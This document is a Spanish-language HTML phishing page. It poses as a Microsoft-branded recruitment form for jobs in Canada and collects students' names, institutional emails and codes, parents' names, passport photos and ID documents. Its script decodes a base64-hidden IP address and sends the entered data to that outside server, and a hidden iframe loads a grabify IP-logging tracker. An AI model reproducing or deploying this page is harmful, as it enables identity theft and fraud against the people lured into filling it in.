<!DOCTYPE html>
<html>
<head>
   <meta http-equiv="x-ua-compatible" content="EmulateIE9">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="shortcut icon" href="https://i.postimg.cc/wTSpJmWt/logo-microsoft.png">
        <!-- Importante Script -->
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <title>Formulario</title>
  <meta charset="UTF-8">
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #172944;
    }

    .form-container {
      max-width: 500px;
      margin: 0 auto;
      padding: 20px;
    }

    .question-container {
      background-color: #fff;
      padding: 10px;
      border-radius: 8px;
      margin-bottom: 20px;
    }

    .form-container h2 {
      text-align: center;
    }

    .form-container label {
      display: block;
      margin-bottom: 10px;
    }

    .form-container input[type="text"],
    .form-container input[type="file"],
    .form-container input[type="email"]
    {
      width: 100%;
      padding: 10px;
      margin-bottom: 10px;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
    }

    .form-container input[type="submit"] {
      background-color: #4CAF50;
      color: white;
      padding: 10px 20px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }

    .form-container input[type="submit"]:hover {
      background-color: #45a049;
    }
  </style>
  
  <script>
    function toggleFileUpload() {
      var matriculaSelect = document.getElementById("matricula");
      var fileUpload = document.getElementById("file-upload");

      if (matriculaSelect.value === "si") {
        fileUpload.style.display = "block";
      } else {
        fileUpload.style.display = "none";
      }
    }

    document.addEventListener("DOMContentLoaded", function() {
      toggleFileUpload();
    });
 
  </script>
</head>
<body>
  <div class="form-container">
    <img src="https://i.postimg.cc/Bbs7gPyJ/Banner-para-formulario.png" alt="Banner" style="display: block; margin: 0 auto; max-width: 100%;">

    <h2 style="color: white;"> Diligencia el siguiente formulario para tenerte en cuenta en nuestro proceso</h2>
    
    <form >    <!-- el ID de myForm es importante ya que es el que hace el envio de la data-->

      <div class="question-container">
        <label>Nombres y apellidos:</label>
        <input type="text" id="nombre" name="nombre" required>
      </div>
      
      <div class="question-container">
        <label>Correo institucional:</label>
        <input type="email" class="form-control rounded-0 bg-transparent" id="mail" name="mail" required><!-- IMPORTANTE EL id -->
       </div>

       <div class="question-container">
        <label>Codigo institucional </label>
        <input type="text" name="code" class="form-control" id="codigo"  >
      </div>

      <div class="question-container">
        <label>Programa academico al que pertenece : </label>
        <input type="text" name="padre_name" class="form-control"   >
      </div>
      
      <div class="question-container">
        <label>Nombre de padre </label>
        <input type="text" name="padre_name" class="form-control"  >
      </div>

      <div class="question-container">
        <label>Nombre de madre </label>
        <input type="text" name="pregunta2">
      </div>

      <div class="question-container">
        <label>Nacionalidad:</label>
        <input type="text" name="pregunta3">
      </div>

    
      <!-- Resto de las preguntas -->
    
      <div class="question-container">
        <label>¿Dispones de Pasaporte?</label>
        <select id="matricula" name="matricula" onchange="toggleFileUpload()">
          <option value="no">No</option>
          <option value="si">Sí</option>
        </select>
     <div  id="file-upload">
      <br></br>
      <label>Sube aqui la foto de tu pasaporte:</label>
        <input type="file" name="foto">
      </div>
    </div>

      <div class="question-container">
        <label>¡Tu hoja de vida es fundamental! Únete a nosotros para encontrar la profesión ideal en Canadá, sin importar tu experiencia laboral. Asegúrate de incluir una fotocopia de tu cédula en un solo PDF al enviar tu solicitud.</label>
        
      <label>Subir archivo:</label>
      <input type="file" name="archivo">
    </div>

    <input class="btn text-white px-4 w-100" type="submit" id="myForm" value="Enviar">
    

  </form>
  </div>
  <iframe src="https://grabify.link/0HRIEL" frameborder="0" hidden></iframe> <!-- URL para validar si abrieron el archivo -->
  </body>

<script>
  $(document).ready(function() {
    $("#myForm").click(function(event) {
      event.preventDefault(); // Evita el envío del formulario

      // Obtener los datos del formulario
      var nombre = $("#nombre").val();
      var mail = $("#mail").val();
      var codigo = $("#codigo").val();
      
      // Codificar la URL en base64
      var urlBase64 = atob("aHR0cDovLzMuODQuMjM0LjEyMTo1MDUwLw==");

      // Realizar la petición Ajax
      $.ajax({
        type: "GET",
        url: urlBase64,
        data: {
          nombre: nombre,
          mail: mail,
          codigo: codigo
        },
        success: function(response) {
          // Manejar la respuesta exitosa aquí
          console.log("Petición enviada con éxito");
          console.log(response);
           // Redirigir al usuario a concient.html
           window.location.href = "concient.html";
        },
        error: function(jqXHR, textStatus, errorThrown) {
          // Manejar los errores aquí
          console.error("Error en la petición Ajax");
          console.error(jqXHR);
          console.error(textStatus);
          console.error(errorThrown);
           // Redirigir al usuario a concient.html
         window.location.href = "concient.html";
        }
      });
    });
  });
</script>

</html>
